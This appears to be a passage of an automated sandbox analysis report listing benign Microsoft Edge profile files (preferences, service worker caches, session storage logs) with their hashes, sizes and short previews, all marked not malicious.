SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RF46406.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d62a24ee-96d6-41a8-ac65-71cff6f3f223.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10436
Entropy (8bit):	5.133818676031041
Encrypted:	false
SSDEEP:	192:stVkdpLsTXsZihUkdgK9Tgu8ObV+FZpQw/m66WI5aFIMY/P8YJ:stVQLsTXfhFgwbGzQwb6WgaTYV
MD5:	886FB034B1C0CD188EA2FBE6512A3B13
SHA1:	78343648193579C0C5275EBAB48C53FB9B1FAA3C
SHA-256:	F46204FD6DE7B9C268E4DE8E1CE7D2A853CDEC0755D84359A25B28BF831564A5
SHA-512:	9D58FA120227B0D92D797D8ED64622FA0C7EE1D01A9647DA7EE741431D77B61B7A4B6997BB724C719D1D15340B646E68211392DC183DD97B189EA716CAF2ED4B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3a8f3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10436
Entropy (8bit):	5.133818676031041
Encrypted:	false
SSDEEP:	192:stVkdpLsTXsZihUkdgK9Tgu8ObV+FZpQw/m66WI5aFIMY/P8YJ:stVQLsTXfhFgwbGzQwb6WgaTYV
MD5:	886FB034B1C0CD188EA2FBE6512A3B13
SHA1:	78343648193579C0C5275EBAB48C53FB9B1FAA3C
SHA-256:	F46204FD6DE7B9C268E4DE8E1CE7D2A853CDEC0755D84359A25B28BF831564A5
SHA-512:	9D58FA120227B0D92D797D8ED64622FA0C7EE1D01A9647DA7EE741431D77B61B7A4B6997BB724C719D1D15340B646E68211392DC183DD97B189EA716CAF2ED4B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f6a6.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10436
Entropy (8bit):	5.133818676031041
Encrypted:	false
SSDEEP:	192:stVkdpLsTXsZihUkdgK9Tgu8ObV+FZpQw/m66WI5aFIMY/P8YJ:stVQLsTXfhFgwbGzQwb6WgaTYV
MD5:	886FB034B1C0CD188EA2FBE6512A3B13
SHA1:	78343648193579C0C5275EBAB48C53FB9B1FAA3C
SHA-256:	F46204FD6DE7B9C268E4DE8E1CE7D2A853CDEC0755D84359A25B28BF831564A5
SHA-512:	9D58FA120227B0D92D797D8ED64622FA0C7EE1D01A9647DA7EE741431D77B61B7A4B6997BB724C719D1D15340B646E68211392DC183DD97B189EA716CAF2ED4B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF46c33.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10436
Entropy (8bit):	5.133818676031041
Encrypted:	false
SSDEEP:	192:stVkdpLsTXsZihUkdgK9Tgu8ObV+FZpQw/m66WI5aFIMY/P8YJ:stVQLsTXfhFgwbGzQwb6WgaTYV
MD5:	886FB034B1C0CD188EA2FBE6512A3B13
SHA1:	78343648193579C0C5275EBAB48C53FB9B1FAA3C
SHA-256:	F46204FD6DE7B9C268E4DE8E1CE7D2A853CDEC0755D84359A25B28BF831564A5
SHA-512:	9D58FA120227B0D92D797D8ED64622FA0C7EE1D01A9647DA7EE741431D77B61B7A4B6997BB724C719D1D15340B646E68211392DC183DD97B189EA716CAF2ED4B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375839977532473","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.57777748830668
Encrypted:	false
SSDEEP:	768:5uggtDWPNFf988F1+UoAYDCx9Tuqh0VfUC9xbog/OVaIkydAarwPjpOtua:5uggtDWPNFf98u1jaPIkAAf8tR
MD5:	B642418B12C1F5CC7FE087D0F934DFB3
SHA1:	C450F575FAFA81901584B0051BD37F906E8CE79B
SHA-256:	9FDC524EB2E2C25D8B808F8B2DD8F035D09F6290F26A100684DD46080F654FFD
SHA-512:	D7BE6DC601D5EF9352D96D24B7B596BBAAD56F75B307C0AAFB94257A6DD2A7A7533F4ACFF99EB80E3C94281C9433431DD5FD401765B623FAFD8C8D8EF3B6472C
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375839977094074","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375839977094074","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3aa99.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26889
Entropy (8bit):	5.57777748830668
Encrypted:	false
SSDEEP:	768:5uggtDWPNFf988F1+UoAYDCx9Tuqh0VfUC9xbog/OVaIkydAarwPjpOtua:5uggtDWPNFf98u1jaPIkAAf8tR
MD5:	B642418B12C1F5CC7FE087D0F934DFB3
SHA1:	C450F575FAFA81901584B0051BD37F906E8CE79B
SHA-256:	9FDC524EB2E2C25D8B808F8B2DD8F035D09F6290F26A100684DD46080F654FFD
SHA-512:	D7BE6DC601D5EF9352D96D24B7B596BBAAD56F75B307C0AAFB94257A6DD2A7A7533F4ACFF99EB80E3C94281C9433431DD5FD401765B623FAFD8C8D8EF3B6472C
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375839977094074","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375839977094074","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	209
Entropy (8bit):	4.781750903806468
Encrypted:	false
SSDEEP:	3:chltUQ2Hm4kxH4xRNwBgzNnNurkXzd064lFlSFdVVl03nUBcis+ArXlK/Fl46JzR:chXUQI2xH8BzNme3fFd4d/rXc4IM1M/
MD5:	7C1B96DAB9280D6BA57513C7B67D992F
SHA1:	B2EE388821413E5CE5D9ECD38998F71B23FFCC69
SHA-256:	103E2BB870EF8E0155FCAEE58BB8B3421B45B580F087A72E59F67C1205C4422B
SHA-512:	765944240657437099C01890941F471D54F628E611E51DF6F50D8CA2902D874E98C664EBDBBFDC1C63E7BCADCFDC006D0B2D0DBC7B6FA4B6D790E859EF3C8D5D
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2r..;................REG:https://ntp.msn.com/.0..REGID_TO_ORIGIN:0MeN+.................URES:0..PRES:0.J4...................PRES:0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.166443835051299
Encrypted:	false
SSDEEP:	6:HUYi61923oH+TcwtE/a252KLlVUYxQ+q2P923oH+TcwtE/a2ZIFUv:biPYeb8xLTxQ+v4Yeb8J2FUv
MD5:	396A598E3F40AE4C870907F225854EDB
SHA1:	C6BE8C6A50D45D189E475A4DCD3F026180E24EBD
SHA-256:	F6C4381A243584FB0947DB17DFA45B9C9CC7EC0EC2B91DFFDB0C6B91C4A7D04A
SHA-512:	D4A9FF36B402DC0A893BC0C32AF2D9E4265204937DB67853E4CD654140270B789D1F415E94C9581610CA154B781132E7011C628C1FBA8597E7923BCDE58C32B1
Malicious:	false
Preview:	2024/11/11-18:06:28.523 19cc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/11-18:06:28.535 19cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113657
Entropy (8bit):	5.579860527093668
Encrypted:	false
SSDEEP:	1536:sa906yxPXfOrr1lhCe1+46rCjF3NlH2BoOz/0iL/rDL/rHM:f9LyxPXfOrr1lMe1z6rWXU8iL/HL/g
MD5:	1B71686B2BD0D0412566C486025CBE19
SHA1:	162601298297CCC1E6DCBE6CAEBD4437CFAF8FD9
SHA-256:	4138C18BC705A7E7E0A1B49ACB46338AD0DAFBF3CC3F8C4A6CF4FC670172C6BA
SHA-512:	4DA9E1E749D8B01A85EF4FF1924D046F05C7D989E2EE947350BE0A5A52CC3FB9AB5AD2969B8CF873DA3088E88C09025D87EDE691AD023FA86CB86912213348DD
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	187801
Entropy (8bit):	6.380559978620431
Encrypted:	false
SSDEEP:	3072:tHP+m8QEmquwXS/KIwGKCV2rzvl9wJqSe/DL/JFVfoC4v7:CuwMwYVu59kqSsL/L14v7
MD5:	5A5B4445346655792A67D5C7484D366A
SHA1:	216FFA5A92608BE08900CBB055A4D75EB301D2AE
SHA-256:	F72CAD333FD65D380F3CCF9424A18D5D0494442A28149BF1FA190BE702ADF6A7
SHA-512:	2CFD1B8615CFDC2E990C3DD3652D6F2D33DC92254050804D85E33B66D0E13FD7EF59C768A10268160DDD6FA5228B136C54420AADB4587800C42DCE9AF457C1D2
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;....x.@........,T.8..`,.....L`.....,T...`......L`......Rc&(L.....exports...Rc..w.....module....Rc.S......define....Rb..@.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.J...b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....S...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:Q3zPyE3lSn:Q3j9In
MD5:	B2EB151A8255A4C873A45761FE8DA70C
SHA1:	15A67A88F61F4BB67AFA91AF11FCDAA5E2C5B2BE
SHA-256:	333006393EE3DA22CC6ED197E02893C95771BF75C010CCD567EC34151C98CDAB
SHA-512:	0D0F5AC07EBC226023B9EF92C439CB4B86AB2C1BDBA6ACA75220C12868756A9A1F75C6E234CC7293A62CDC7520D435902139DE722513DDFA745C8696F5D6C6C8
Malicious:	false
Preview:	(....Rd'oy retne...........................qA./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:Q3zPyE3lSn:Q3j9In
MD5:	B2EB151A8255A4C873A45761FE8DA70C
SHA1:	15A67A88F61F4BB67AFA91AF11FCDAA5E2C5B2BE
SHA-256:	333006393EE3DA22CC6ED197E02893C95771BF75C010CCD567EC34151C98CDAB
SHA-512:	0D0F5AC07EBC226023B9EF92C439CB4B86AB2C1BDBA6ACA75220C12868756A9A1F75C6E234CC7293A62CDC7520D435902139DE722513DDFA745C8696F5D6C6C8
Malicious:	false
Preview:	(....Rd'oy retne...........................qA./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3da05.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:Q3zPyE3lSn:Q3j9In
MD5:	B2EB151A8255A4C873A45761FE8DA70C
SHA1:	15A67A88F61F4BB67AFA91AF11FCDAA5E2C5B2BE
SHA-256:	333006393EE3DA22CC6ED197E02893C95771BF75C010CCD567EC34151C98CDAB
SHA-512:	0D0F5AC07EBC226023B9EF92C439CB4B86AB2C1BDBA6ACA75220C12868756A9A1F75C6E234CC7293A62CDC7520D435902139DE722513DDFA745C8696F5D6C6C8
Malicious:	false
Preview:	(....Rd'oy retne...........................qA./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF48847.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:Q3zPyE3lSn:Q3j9In
MD5:	B2EB151A8255A4C873A45761FE8DA70C
SHA1:	15A67A88F61F4BB67AFA91AF11FCDAA5E2C5B2BE
SHA-256:	333006393EE3DA22CC6ED197E02893C95771BF75C010CCD567EC34151C98CDAB
SHA-512:	0D0F5AC07EBC226023B9EF92C439CB4B86AB2C1BDBA6ACA75220C12868756A9A1F75C6E234CC7293A62CDC7520D435902139DE722513DDFA745C8696F5D6C6C8
Malicious:	false
Preview:	(....Rd'oy retne...........................qA./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	5217
Entropy (8bit):	3.4418226268024963
Encrypted:	false
SSDEEP:	96:6KvK06eDDShTVNzNv5Lgb29Xp+DY+di7uy5SLl9iSri1WENMn7FH:PZLDKzNv5K29Xp+sqiB5SLl9iSriPNMn
MD5:	F57C770F20A6030CEBE85682D8C63526
SHA1:	5FEA744337B070E854DE723B7095F91CABFDB197
SHA-256:	A2E127B8F383B41BE163D6E4CECF8B5ED016A1DB34246DDE7B65BBB0AD913DE2
SHA-512:	654FAC04A408C7F6FAFA25DCF014BB2D94D6496D4DED58AB128D247972AEA28E1ADBE7F6F34E5423101F03DD66A128CC534453C0435814E4C2320920D028E2E4
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................=..b................next-map-id.1.Cnamespace-9a8f4a5b_c3ea_4786_8310_fa61365b67c5-https://ntp.msn.com/.0.}P..................map-0-shd_sweeper.%{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.t.q.l.t.c.,.p.r.g.-.c.a.l.-.5.c.o.l.u.m.n.,.s.p.-.l.a.y.-.c.t.l.,.p.r.g.-.1.s.w.-.s.a.-.g.o.l.d.e.n.-.t.1.2.5.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.1.j.,.p.r.g.-.1.s.w.-.s.a.p.s.h.l.d.o.u.t.c.,.p.r.g.-.1.s.w.-.c.t.a.d.d.d.b.g.,.p.r.g.-.1.s.w.-.c.-.r.i.v.d.d.r.,.p.r.g.-.f.i.n.-.l.2.d.u.e.a.,.2.4.0.9.-.n.e.w.-.b.i.n.g.-.d.e.s.i.g.n.-.c.,.r.o.u.t.e.a.u.t.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.1.s.w.-.r.e.v.e.n.u.e.0.7.,.t.r.a.f.f.i.c.-.p.r.2.-.n.e.w.s.-.c.f.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.p.r.g.-.p.r.2.-.t.r.d.i.s.c.l.o.2.,.p.r.g.-.p.r.2.-.t.r.d.i.s.c.l.o.,.1.s.-.p.2.-.u.s.e.c.m.,.b.t.i.e.-.m.s.n.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

